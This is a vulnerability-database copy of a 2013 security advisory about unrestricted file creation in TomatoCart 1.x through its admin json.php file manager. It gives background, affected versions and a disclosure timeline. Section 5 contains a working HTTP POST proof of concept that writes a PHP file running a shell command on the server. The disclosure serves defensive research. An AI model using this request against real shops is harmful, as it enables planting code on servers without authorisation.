Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

TomatoCart 1.x Unrestricted File Creation

🗓️ 06 Jan 2013 00:00:00Reported by Aung KhantType 
zdt
 zdt🔗 0day.today👁 56 Views

Unrestricted File Creation in TomatoCart 1.x, allowing arbitrary shell script creatio

Code
1. OVERVIEW

TomatoCart 1.x versions are vulnerable to Unrestricted File Creation.


2. BACKGROUND

TomatoCart is an innovative Open Source shopping cart solution
developed by Wuxi Elootec Technology Co., Ltd. It is forked from
osCommerce 3 as a separate project and is released under the GNU
General Public License V2. Equipped with the web2.0 Technology Ajax
and Rich Internet applications (RIAs), TomatoCart Team is devoted to
building a landmark eCommerce solution.


3. VULNERABILITY DESCRIPTION

TomatoCart 1.x versions contain a flaw related to the /admin/json.php
script's failure to properly restrict created files. This may allow an
attacker to create arbitrary shell script to launch further attacks on
the application server.


4. VERSIONS AFFECTED

Tested on 1.1.8, 1.1.5


5. PROOF-OF-CONCEPT/EXPLOIT

/////////////////////////////////////////////////////////////////////
POST /admin/json.php HTTP/1.1
Host: localhost
Cookie: admin_language=en_US; toCAdminID=edfd1d6b88d0c853c2b83cc63aca5e14
Content-Type: application/x-www-form-urlencoded
Content-Length: 195

module=file_manager&action=save_file&file_name=0wned.php&directory=/&token=edfd1d6b88d0c853c2b83cc63aca5e14&ext-comp-1277=0wned.php&content=<?+echo
'<h1>0wned!</h1><pre>';+echo `ls+-al`; ?>
///////////////////////////////////////////////////////////////


6. SOLUTION

The vendor did not show commitment in hardening the application.
It is recommended to use alternative shopping cart application with
good track record of security fixes.


7. VENDOR

Wuxi Elootec Technology Co., Ltd.


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-04-22: Contacted the vendor through email
2012-04-29: Vendor replied and the vulnerability detail was sent
2013-01-04: Vulnerability not fixed
2013-01-04: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Btomatocart1.x%5D_arbitrary_file_creation
TomatoCart Home Page: http://www.tomatocart.com/

#  0day.today [2018-04-10]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Jan 2013 00:00Current
7High risk
Vulners AI Score7
tomatocartunrestricted file creationarbitrary shell scriptvendorvulnerabilitydisclosure timelineshopping cart applicationsecurity fixeswuxi elootec technology co.ltdaung khantygn ethical hacker group
56